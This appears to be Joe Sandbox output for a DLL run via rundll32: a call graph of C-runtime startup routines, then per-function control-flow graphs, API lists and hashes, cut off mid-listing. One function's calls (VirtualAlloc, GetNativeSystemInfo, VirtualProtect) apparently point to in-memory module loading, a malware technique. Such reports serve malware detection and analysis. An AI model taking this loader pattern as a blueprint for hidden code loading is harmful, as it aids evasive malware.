21347->21348 21356 100236ce 21348->21356 21351 1001fbb1 21361 1002e804 68 API calls 3 library calls 21351->21361 21353 1001fbeb 21353->21344 21355->21344 21357 100236e2 21356->21357 21358 1001fba3 21356->21358 21359 1002e654 _malloc 67 API calls 21357->21359 21358->21351 21360 1001fb50 80 API calls codecvt 21358->21360 21359->21358 21360->21351 21361->21353 21362 1002eaac 21363 1002eab7 21362->21363 21364 1002eabc 21362->21364 21380 1003732f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21363->21380 21368 1002e9b6 21364->21368 21367 1002eaca 21370 1002e9c2 __fcloseall 21368->21370 21369 1002ea0f 21378 1002ea5f __fcloseall 21369->21378 21428 10008080 21369->21428 21370->21369 21370->21378 21381 1002e881 21370->21381 21378->21367 21380->21364 21382 1002e890 21381->21382 21383 1002e90c 21381->21383 21433 10035645 HeapCreate 21382->21433 21385 1002e943 21383->21385 21390 1002e912 21383->21390 21386 1002e948 21385->21386 21387 1002e9a1 21385->21387 21552 1003459f 8 API calls __decode_pointer 21386->21552 21396 1002e89b 21387->21396 21583 100348b9 79 API calls 2 library calls 21387->21583 21391 1002e92d 21390->21391 21390->21396 21548 10030912 67 API calls _doexit 21390->21548 21391->21396 21549 10036caa 68 API calls __read_nolock 21391->21549 21393 1002e94d 21553 100351f3 21393->21553 21396->21369 21398 1002e8a7 __RTC_Initialize 21401 1002e8ab 21398->21401 21407 1002e8b7 GetCommandLineA 21398->21407 21545 10035675 VirtualFree HeapFree HeapFree HeapDestroy 21401->21545 21402 1002e937 21550 100345d3 70 API calls 2 library calls 21402->21550 21406 1002e93c 21551 10035675 VirtualFree HeapFree HeapFree HeapDestroy 21406->21551 21469 1003702b 21407->21469 21413 1002e8d1 21416 1002e8d5 21413->21416 21511 10036f70 21413->21511 21414 1002e995 21570 1002e577 21414->21570 21415 1002e97e 21569 10034610 67 API calls 5 library calls 21415->21569 21546 100345d3 70 API calls 2 library calls 21416->21546 21421 1002e985 GetCurrentThreadId 21421->21396 21423 1002e8f5 21423->21396 21547 10036caa 68 API calls __read_nolock 21423->21547 21699 1001ffa0 21428->21699 21434 1002e896 21433->21434 21434->21396 21435 10034927 GetModuleHandleW 21434->21435 21436 10034942 21435->21436 21437 1003493b 21435->21437 21439 10034aaa 21436->21439 21440 1003494c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21436->21440 21584 1003065c Sleep GetModuleHandleW 21437->21584 21600 100345d3 70 API calls 2 library calls 21439->21600 21441 10034995 TlsAlloc 21440->21441 21445 10034aaf 21441->21445 21446 100349e3 TlsSetValue 21441->21446 21443 10034941 21443->21436 21445->21398 21446->21445 21447 100349f4 21446->21447 21585 10030921 7 API calls 4 library calls 21447->21585 21449 100349f9 21586 100344a9 TlsGetValue 21449->21586 21452 100344a9 __encode_pointer 7 API calls 21453 10034a14 21452->21453 21454 100344a9 __encode_pointer 7 API calls 21453->21454 21455 10034a24 21454->21455 21456 100344a9 __encode_pointer 7 API calls 21455->21456 21457 10034a34 21456->21457 21598 100356e9 InitializeCriticalSectionAndSpinCount __mtinitlocknum 21457->21598 21459 10034a41 21459->21439 21460 10034524 __decode_pointer 6 API calls 21459->21460 21461 10034a55 21460->21461 21461->21439 21462 100351f3 __calloc_crt 67 API calls 21461->21462 21463 10034a6e 21462->21463 21463->21439 21464 10034524 __decode_pointer 6 API calls 21463->21464 21465 10034a88 21464->21465 21465->21439 21466 10034a8f 21465->21466 21599 10034610 67 API calls 5 library calls 21466->21599 21468 10034a97 GetCurrentThreadId 21468->21445 21470 10037049 GetEnvironmentStringsW 21469->21470 21474 10037068 21469->21474 21471 10037051 21470->21471 21472 1003705d GetLastError 21470->21472 21476 10037093 WideCharToMultiByte 21471->21476 21477 10037084 GetEnvironmentStringsW 21471->21477 21472->21474 21473 10037101 21475 1003710a GetEnvironmentStrings 21473->21475 21478 1002e8c7 21473->21478 21474->21471 21474->21473 21475->21478 21479 1003711a 21475->21479 21482 100370c7 21476->21482 21483 100370f6 FreeEnvironmentStringsW 21476->21483 21477->21476 21477->21478 21496 10036a56 21478->21496 21603 100351ae 67 API calls _malloc 21479->21603 21602 100351ae 67 API calls _malloc 21482->21602 21483->21478 21486 10037134 21489 10037147 21486->21489 21490 1003713b FreeEnvironmentStringsA 21486->21490 21487 100370cd 21487->21483 21488 100370d5 WideCharToMultiByte 21487->21488 21491 100370e7 21488->21491 21495 100370ef 21488->21495 21604 1002db20 __VEC_memcpy 21489->21604 21490->21478 21493 1002e577 __read_nolock 67 API calls 21491->21493 21493->21495 21494 10037151 FreeEnvironmentStringsA 21494->21478 21495->21483 21605 10030e38 21496->21605 21498 10036a62 GetStartupInfoA 21499 100351f3 __calloc_crt 67 API calls 21498->21499 21506 10036a83 21499->21506 21500 10036ca1 __fcloseall 21500->21413 21501 10036c1e GetStdHandle 21505 10036be8 21501->21505 21502 10036c83 SetHandleCount 21502->21500 21503 100351f3 __calloc_crt 67 API calls 21503->21506 21504 10036c30 GetFileType 21504->21505 21505->21500 21505->21501 21505->21502 21505->21504 21607 100386ab InitializeCriticalSectionAndSpinCount __fcloseall 21505->21607 21506->21500 21506->21503 21506->21505 21508 10036b6b 21506->21508 21507 10036b94 GetFileType 21507->21508 21508->21500 21508->21505 21508->21507 21606 100386ab InitializeCriticalSectionAndSpinCount __fcloseall 21508->21606 21512 10036f85 21511->21512 21513 10036f8a GetModuleFileNameA 21511->21513 21614 100334dc 111 API calls __setmbcp 21512->21614 21514 10036fb1 21513->21514 21608 10036dd6 21514->21608 21518 1002e8e1 21518->21423 21524 10036cf8 21518->21524 21519 10036fed 21615 100351ae 67 API calls _malloc 21519->21615 21521 10036ff3 21521->21518 21522 10036dd6 _parse_cmdline 77 API calls 21521->21522 21523 1003700d 21522->21523 21523->21518 21525 10036d01 21524->21525 21528 10036d06 _strlen 21524->21528 21617 100334dc 111 API calls __setmbcp 21525->21617 21526 1002e8ea 21526->21423 21539 1003074b 21526->21539 21528->21526 21529 100351f3 __calloc_crt 67 API calls 21528->21529 21533 10036d3b _strlen 21529->21533 21530 10036d99 21531 1002e577 __read_nolock 67 API calls 21530->21531 21531->21526 21532 100351f3 __calloc_crt 67 API calls 21532->21533 21533->21526 21533->21530 21533->21532 21534 10036dbf 21533->21534 21537 10036d80 21533->21537 21618 1003096f 67 API calls __read_nolock 21533->21618 21535 1002e577 __read_nolock 67 API calls 21534->21535 21535->21526 21537->21533 21619 10032cb9 10 API calls 3 library calls 21537->21619 21540 10030759 __IsNonwritableInCurrentImage 21539->21540 21620 1003817c 21540->21620 21542 10030777 __initterm_e 21544 10030796 __IsNonwritableInCurrentImage __initterm 21542->21544 21624 1002e391 21542->21624 21544->21423 21545->21396 21546->21401 21547->21416 21548->21391 21549->21402 21550->21406 21551->21396 21552->21393 21555 100351fc 21553->21555 21556 1002e959 21555->21556 21557 1003521a Sleep 21555->21557 21677 1003b872 21555->21677 21556->21396 21559 10034524 TlsGetValue 21556->21559 21558 1003522f 21557->21558 21558->21555 21558->21556 21560 1003455d GetModuleHandleW 21559->21560 21561 1003453c 21559->21561 21563 10034578 GetProcAddress 21560->21563 21564 1003456d 21560->21564 21561->21560 21562 10034546 TlsGetValue 21561->21562 21568 10034551 21562->21568 21566 1002e977 21563->21566 21695 1003065c Sleep GetModuleHandleW 21564->21695 21566->21414 21566->21415 21567 10034573 21567->21563 21567->21566 21568->21560 21568->21566 21569->21421 21571 1002e583 __fcloseall 21570->21571 21572 1002e5c2 21571->21572 21573 1002e5fc __fcloseall __expand 21571->21573 21575 10035865 __lock 65 API calls 21571->21575 21572->21573 21574 1002e5d7 RtlFreeHeap 21572->21574 21573->21396 21574->21573 21576 1002e5e9 21574->21576 21577 1002e59a ___sbh_find_block 21575->21577 21698 10030d24 67 API calls __getptd_noexit 21576->21698 21580 1002e5b4 21577->21580 21696 100358c8 VirtualFree VirtualFree HeapFree ___BuildCatchObjectHelper 21577->21696 21579 1002e5ee GetLastError 21579->21573 21697 1002e5cd LeaveCriticalSection _doexit 21580->21697 21583->21396 21584->21443 21585->21449 21587 100344e2 GetModuleHandleW 21586->21587 21588 100344c1 21586->21588 21589 100344f2 21587->21589 21590 100344fd GetProcAddress 21587->21590 21588->21587 21591 100344cb TlsGetValue 21588->21591 21601 1003065c Sleep GetModuleHandleW 21589->21601 21597 100344da 21590->21597 21596 100344d6 21591->21596 21593 100344f8 21593->21590 21594 10034515 21593->21594 21594->21452 21595 1003450d RtlEncodePointer 21595->21594 21596->21587 21596->21597 21597->21594 21597->21595 21598->21459 21599->21468 21600->21445 21601->21593 21602->21487 21603->21486 21604->21494 21605->21498 21606->21508 21607->21505 21610 10036df5 21608->21610 21612 10036e62 21610->21612 21616 10031907 77 API calls x_ismbbtype_l 21610->21616 21611 10036f60 21611->21518 21611->21519 21612->21611 21613 10031907 77 API calls _parse_cmdline 21612->21613 21613->21612 21614->21513 21615->21521 21616->21610 21617->21528 21618->21533 21619->21537 21621 10038182 21620->21621 21622 100344a9 __encode_pointer 7 API calls 21621->21622 21623 1003819a 21621->21623 21622->21621 21623->21542 21627 1002e355 21624->21627 21626 1002e39e 21626->21544 21628 1002e361 __fcloseall 21627->21628 21635 100306f8 21628->21635 21634 1002e382 __fcloseall 21634->21626 21661 10035865 21635->21661 21637 1002e366 21638 1002e26a 21637->21638 21639 10034524 __decode_pointer 6 API calls 21638->21639 21640 1002e27e 21639->21640 21641 10034524 __decode_pointer 6 API calls 21640->21641 21642 1002e28e 21641->21642 21653 1002e311 21642->21653 21670 100317be 68 API calls 5 library calls 21642->21670 21644 1002e2ac 21647 1002e2d6 21644->21647 21648 1002e2c7 21644->21648 21657 1002e2f8 21644->21657 21645 100344a9 __encode_pointer 7 API calls 21646 1002e306 21645->21646 21649 100344a9 __encode_pointer 7 API calls 21646->21649 21651 1002e2d0 21647->21651 21647->21653 21671 1003523f 74 API calls _realloc 21648->21671 21649->21653 21651->21647 21655 1002e2ec 21651->21655 21672 1003523f 74 API calls _realloc 21651->21672 21658 1002e38b 21653->21658 21654 1002e2e6 21654->21653 21654->21655 21656 100344a9 __encode_pointer 7 API calls 21655->21656 21656->21657 21657->21645 21673 10030701 21658->21673 21662 1003587a 21661->21662 21663 1003588d EnterCriticalSection 21661->21663 21668 100357a2 67 API calls 7 library calls 21662->21668 21663->21637 21665 10035880 21665->21663 21669 1003068c 67 API calls 3 library calls 21665->21669 21667 1003588c 21667->21663 21668->21665 21669->21667 21670->21644 21671->21651 21672->21654 21676 1003578b LeaveCriticalSection 21673->21676 21675 1002e390 21675->21634 21676->21675 21678 1003b87e __fcloseall 21677->21678 21679 1003b896 21678->21679 21682 1003b8b5 _memset 21678->21682 21690 10030d24 67 API calls __getptd_noexit 21679->21690 21681 1003b89b 21691 10032de1 6 API calls 2 library calls 21681->21691 21684 1003b927 RtlAllocateHeap 21682->21684 21686 10035865 __lock 66 API calls 21682->21686 21687 1003b8ab __fcloseall 21682->21687 21692 10036077 5 API calls 2 library calls 21682->21692 21693 1003b96e LeaveCriticalSection _doexit 21682->21693 21694 1003654f 6 API calls __decode_pointer 21682->21694 21684->21682 21686->21682 21687->21555 21690->21681 21692->21682 21693->21682 21694->21682 21695->21567 21696->21580 21697->21572 21698->21579 21700 1001ffdf _strlen 21699->21700 21714 1001f0b0 21700->21714 21702 10020056 ___DllMainCRTStartup 21705 10020305 21702->21705 21723 10001920 69 API calls 4 library calls 21702->21723 21704 10020326 21719 1001f970 21704->21719 21705->21704 21724 1001f830 69 API calls ___DllMainCRTStartup 21705->21724 21709 10008000 21710 1002e654 _malloc 67 API calls 21709->21710 21711 10008010 21710->21711 21712 1000801c 21711->21712 21713 1002e577 __read_nolock 67 API calls 21711->21713 21713->21712 21725 1001f910 21714->21725 21717 1001f148 21717->21702 21720 1001f995 21719->21720 21721 1000809c 21719->21721 21731 10044028 LeaveCriticalSection int 21720->21731 21721->21709 21723->21705 21724->21704 21726 1001f93d 21725->21726 21727 1001f0ed 21725->21727 21730 1004401f EnterCriticalSection std::_Lockit::_Lockit 21726->21730 21727->21717 21729 1001ea80 69 API calls std::ios_base::_Init 21727->21729 21729->21717 21730->21727 21731->21721

                                                                                                          Executed Functions

                                                                                                          Function 10002D40, Relevance: 22.8, APIs: 15, Instructions: 331COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7 10002d40-10002d67 call 100024a0 10 10002d70-10002d81 7->10 11 10002d69-10002d6b 7->11 13 10002d83-10002d90 SetLastError 10->13 14 10002d95-10002db0 call 100024a0 10->14 12 1000315a-1000315d 11->12 13->12 17 10002db2-10002db4 14->17 18 10002db9-10002dce 14->18 17->12 19 10002dd0-10002ddd SetLastError 18->19 20 10002de2-10002def 18->20 19->12 21 10002df1-10002dfe SetLastError 20->21 22 10002e03-10002e0c 20->22 21->12 23 10002e20-10002e41 22->23 24 10002e0e-10002e1b SetLastError 22->24 25 10002e55-10002e5f 23->25 24->12 26 10002e61-10002e68 25->26 27 10002e97-10002ed2 GetNativeSystemInfo 25->27 30 10002e78-10002e84 26->30 31 10002e6a-10002e76 26->31 28 10002ed4-10002ee1 SetLastError 27->28 29 10002ee6-10002f05 VirtualAlloc 27->29 28->12 33 10002f32-10002f4a GetProcessHeap HeapAlloc 29->33 34 10002f07-10002f21 VirtualAlloc 29->34 32 10002e87-10002e8d 30->32 31->32 35 10002e95 32->35 36 10002e8f-10002e92 32->36 38 10002f6c-10002fd0 call 100024a0 33->38 39 10002f4c-10002f67 VirtualFree SetLastError 33->39 34->33 37 10002f23-10002f2d SetLastError 34->37 35->25 36->35 37->12 43 10002fd2 38->43 44 10002fdc-10003041 VirtualAlloc call 10002320 call 100024d0 38->44 39->12 45 1000314c-10003158 call 10003310 43->45 52 10003043 44->52 53 1000304d-1000305e 44->53 45->12 52->45 54 10003060-10003076 call 100029c0 53->54 55 10003078-1000307b 53->55 57 10003082-10003090 call 10002ab0 54->57 55->57 61 10003092 57->61 62 1000309c-100030aa call 100027c0 57->62 61->45 65 100030b6-100030c4 call 10002940 62->65 66 100030ac 62->66 69 100030c6 65->69 70 100030cd-100030d6 65->70 66->45 69->45 71 100030d8-100030df 70->71 72 1000313d-10003140 70->72 73 100030e1-10003102 71->73 74 1000312a-10003138 71->74 75 10003147-1000314a 72->75 77 10003106-1000310d 73->77 76 1000313b 74->76 75->12 75->45 76->75 78 1000311e-10003128 77->78 79 1000310f-1000311a SetLastError 77->79 78->76 79->45
                                                                                                          APIs
                                                                                                            • Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1
                                                                                                          • SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                                                                                                          • Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
                                                                                                          • GlobalHandle.KERNEL32 ref: 1002AE1E
                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
                                                                                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 1002AE41
                                                                                                          • GlobalHandle.KERNEL32 ref: 1002AE53
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE5A
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE6F
                                                                                                          • _memset.LIBCMT ref: 1002AE89
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 496899490-0
                                                                                                          • Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
                                                                                                          • Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __lock.LIBCMT ref: 1002E595
                                                                                                            • Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
                                                                                                            • Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
                                                                                                            • Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F
                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002E5A0
                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002E5AF
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
                                                                                                          • GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714421763-0
                                                                                                          • Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
                                                                                                          • Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 131 100036a0-100036bb call 1002e654 133 100036c0-100036e5 131->133 135 10003896-100038b1 133->135 136 100036eb-10003891 133->136 138 100038b7-10004a34 135->138 139 10004a39-10004a3d 135->139
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 100036BB
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 501242067-2694261586
                                                                                                          • Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
                                                                                                          • Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 140 10003440-1000344d 141 10003454-10003462 140->141 142 1000344f call 100033f0 140->142 144 10003464-10003466 141->144 145 1000346b-10003486 141->145 142->141 146 10003699-1000369c 144->146 147 10003495-100034a2 145->147 148 10003488-10003493 145->148 149 100034b1-100034b7 call 1002e654 147->149 150 100034a4-100034af 147->150 148->147 152 100034bc-100034c6 149->152 150->149 153 100034c8-100034ca 152->153 154 100034cf-100034d6 152->154 153->146 155 100034dd-100034e3 154->155 156 10003696 155->156 157 100034e9-100034f5 155->157 156->146 158 100034f7-10003509 157->158 159 1000350b-10003527 157->159 160 1000352a-1000353c 158->160 159->160 161 10003552-1000356d 160->161 162 1000353e-10003550 160->162 163 10003570-10003582 161->163 162->163 164 10003584-10003596 163->164 165 10003598-100035b4 163->165 166 100035b7-100035c9 164->166 165->166 167 100035cb-100035dd 166->167 168 100035df-100035fb 166->168 169 100035fe-10003628 167->169 168->169 170 10003647-1000364f 169->170 171 1000362a-10003644 169->171 172 10003651-1000366b 170->172 173 1000366e-10003676 170->173 171->170 172->173 174 10003691 173->174 175 10003678-1000368e 173->175 174->155 175->174
                                                                                                          APIs
                                                                                                            • Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9
                                                                                                          • _malloc.LIBCMT ref: 100034B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 1579825452-2694261586
                                                                                                          • Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
                                                                                                          • Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 176 10002690-100026a0 177 100026a2-100026a7 176->177 178 100026ac-100026b8 176->178 179 100027ac-100027af 177->179 180 10002714-10002776 178->180 181 100026ba-100026c5 178->181 184 10002784-100027a1 VirtualProtect 180->184 185 10002778-10002781 180->185 182 100026c7-100026ce 181->182 183 1000270a-1000270f 181->183 186 100026d0-100026de 182->186 187 100026f2-10002704 VirtualFree 182->187 183->179 188 100027a3-100027a5 184->188 189 100027a7 184->189 185->184 186->187 190 100026e0-100026f0 186->190 187->183 188->179 189->179 190->183 190->187
                                                                                                          APIs
                                                                                                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
